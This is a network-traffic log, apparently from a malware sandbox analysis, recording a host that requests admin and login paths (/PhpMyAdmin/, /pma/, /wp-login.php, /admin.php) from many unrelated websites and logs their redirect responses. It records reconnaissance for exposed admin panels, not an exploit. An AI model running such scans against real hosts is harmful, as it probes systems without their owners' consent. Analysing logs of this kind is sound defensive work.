User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.263190031 CET | 582 | IN | HTTP/1.1 301 Moved Permanently
Cache-control: no-cache="set-cookie"
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:11 GMT
Location: https://ucv.blackboard.com/PhpMyAdmin/
Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CD;PATH=/;MAX-AGE=900
Content-Length: 175
Connection: keep-alive
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
493 | 192.168.2.6 | 65250 | 164.100.128.15 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.146816969 CET | 176 | OUT | GET /admin.php HTTP/1.1
Host: upsconline.nic.in
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.532030106 CET | 139 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://upsconline.nic.in/admin.php
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
494 | 192.168.2.6 | 65257 | 202.81.112.32 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.146864891 CET | 184 | OUT | GET /wp-login.php HTTP/1.1
Host: testconnect.garena.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.470675945 CET | 358 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://testconnect.garena.com/wp-login.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
495 | 192.168.2.6 | 65253 | 77.240.114.212 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.146922112 CET | 173 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: mw.redsa.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.364701986 CET | 437 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:09 GMT
Server: Apache
Location: https://mw.redsa.net/PhpMyAdmin/
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/PhpMyAdmin/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
496 | 192.168.2.6 | 65349 | 31.13.88.1 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.156661034 CET | 180 | OUT | GET /wp-login.php HTTP/1.1
Host: th-th.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.258752108 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
Location: https://th-th.facebook.com/wp-login.php
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:11 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
497 | 192.168.2.6 | 65340 | 170.114.52.4 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.167551041 CET | 174 | OUT | GET /admin.php HTTP/1.1
Host: us04web.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.294943094 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:16:26 GMT
Set-Cookie: __cf_bm=cz6OvsiBACg0ZCMyEcNWjbl1FV6qUh4fJWLOzoM7ke4-1707131771-1-AeliCr4RJ4TDTW07imlxSGnq+BG0fXlLsV76PHmEnSJ4lQXHmOyeJ1m5RXtNVtKmhyZbaDR0hnTLhqC7yUEN9xg=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKcl7Cl4r4Qvs5PBdaVATklz6Oakkw9Ec0vq2wFiMZqKqfxHWlb479b8sRMYAPHB8KQH2TwQlNvRRKDsrVfcNGj4bOw0eyxinclL5h94ioo0%2F%2BWhB1f6xH7lp43xIohZKA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd621c33b08e-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400


Session ID: 498
Source IP: 192.168.2.6
Source Port: 65350
Destination IP: 104.22.74.220
Destination Port: 80

Timestamp: Feb 5, 2024 12:16:11.170756102 CET
Bytes transferred: 174
Direction: OUT
Data:
GET /PhpMyAdmin/ HTTP/1.1
Host: mojadovera.sk
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: Feb 5, 2024 12:16:11.301948071 CET
Bytes transferred: 345
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:11 GMT
Location: https://mojadovera.sk/PhpMyAdmin/
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd622dd45080-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 499
Source IP: 192.168.2.6
Source Port: 65356
Destination IP: 142.250.105.84
Destination Port: 80

Timestamp: Feb 5, 2024 12:16:11.176917076 CET
Bytes transferred: 180
Direction: OUT
Data:
GET /PhpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: Feb 5, 2024 12:16:11.300578117 CET
Bytes transferred: 485
Direction: IN
Data:
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:11 GMT
Location: https://accounts.google.com/PhpMyAdmin/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 184
Server: GSE

Timestamp: Feb 5, 2024 12:16:11.300590038 CET
Bytes transferred: 184
Direction: IN
Data: gzip-compressed response body


Session ID: 500
Source IP: 192.168.2.6
Source Port: 65357
Destination IP: 142.250.105.84
Destination Port: 80

Timestamp: Feb 5, 2024 12:16:11.176965952 CET
Bytes transferred: 173
Direction: OUT
Data:
GET /pma/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: Feb 5, 2024 12:16:11.301479101 CET
Bytes transferred: 478
Direction: IN
Data:
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:11 GMT
Location: https://accounts.google.com/pma/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 178
Server: GSE

Timestamp: Feb 5, 2024 12:16:11.301655054 CET
Bytes transferred: 178
Direction: IN
Data: gzip-compressed response body


Session ID: 501
Source IP: 192.168.2.6
Source Port: 65352
Destination IP: 3.141.96.53
Destination Port: 80

Timestamp: Feb 5, 2024 12:16:11.370207071 CET
Bytes transferred: 174
Direction: OUT
Data:
GET /PhpMyAdmin/ HTTP/1.1
Host: money-farm.cc
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: Feb 5, 2024 12:16:11.492969036 CET
Bytes transferred: 149
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
location: https://money-farm.cc/PhpMyAdmin/
transfer-encoding: chunked
date: Mon, 05 Feb 2024 11:16:11 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
502 | 192.168.2.6 | 65358 | 34.149.46.130 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.370287895 CET | 175 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.472712994 CET | 204 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
503 | 192.168.2.6 | 65359 | 142.250.105.84 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.370822906 CET | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.497370958 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:16:11.497426033 CET | 184 | IN | Data Raw: [gzip-compressed response body; hex dump omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port
504 | 192.168.2.6 | 65360 | 44.199.96.179 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.370903015 CET | 182 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.487854958 CET | 401 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
505 | 192.168.2.6 | 65373 | 104.26.14.180 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.370970964 CET | 186 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.502578020 CET | 664 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://aeaaamorim.inovarmais.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6fbCjTjbhiLbzZVL6japWFd9kbj0XLXwfBIlPCuaYhndBzSQrhK5X5af5TXkjh%2BV6%2BDTex3BbxpJ%2BaYHlY4jIk7ATLuhP2gxZE1yBJqTZ7wdN8y7RSfJQJyPVZIUDZM3RauTvwXXSJL6MJQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636eac7bac-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
506 | 192.168.2.6 | 65362 | 172.67.170.147 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.371175051 CET | 182 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.645396948 CET | 824 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QKZjL9%2Bo1fm8j2Q467gzwjuN8IW%2BvQMYJiW7Jh2gJRoJ0hnD4qnAtc63Tn0hIU6SvBd7L2Zv386X7Gex%2Fkn6RULhnFxnEEryd38jv9YbN0Ofpywkuh967KkaZhzcJQ2fuQjJ7HWlegU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636a02b056-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
Feb 5, 2024 12:16:11.645427942 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
507 | 192.168.2.6 | 65363 | 172.66.43.117 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:11.371241093 CET | 167 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.530622005 CET | 1286 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                location: http://login.adf.ly/admin/
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L0%2FnFs3ILXk057h2djqVRwCSOvuJf9VFgYyleIELgSq0uJpcXpNyUepAvQb2TJZXvDsyZdnpo6JaK5CydhzypWXvFfFciHhf16gzn5WxgW4m6iymXWr80FmLiQe5Uys%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636d39244d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The do
Feb 5, 2024 12:16:11.530635118 CET | 68 | IN | Data Raw: 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cument has been permanently moved.</p></div></div></body></html>
Feb 5, 2024 12:16:11.530644894 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:11.629961967 CET | 168 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.777275085 CET | 1286 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/admin/
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6WF5GURww7h4xFLoSIdxFOmi8OhJctP7OI%2Bs%2Fh%2BAnf4DmUncfL9gX0POEgOITgboAMyzJC%2BMN9Z9eyjKu5fe8a9Vn61KQ4HmhkLOt%2BKhI81uACtPHcqD4HR7MfKvyhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd650eae244d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h
Feb 5, 2024 12:16:11.777287006 CET  133                IN         Data Raw: 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
Feb 5, 2024 12:16:11.777297020 CET  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
508         192.168.2.6  65366        172.66.40.88     80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.371306896 CET  176                OUT        GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.662486076 CET  1140               IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GS6ZW39QYrOgdjPhTB3viDMZmWgqEhkXhgnDwzQKSRlOXc6FgBNbebTvgzPmJ0u03H%2F2xMzj5SQnSSinbfIzN7Y%2FbpTWhI3GJDWWufNGLp5QiZZgh%2FZiDOCxfnIOK%2BU4eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd636eac6737-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abd636eac6737","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
Feb 5, 2024 12:16:11.662516117 CET  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
509         192.168.2.6  65378        31.13.65.1       80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.371380091 CET  178                OUT        GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.473507881 CET  212                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
510         192.168.2.6  65351        64.190.63.136    80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:11.371448040 CET  221                OUT        GET /admin?sub1=20240205-2216-10dd-af1c-3865e2a64b77 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
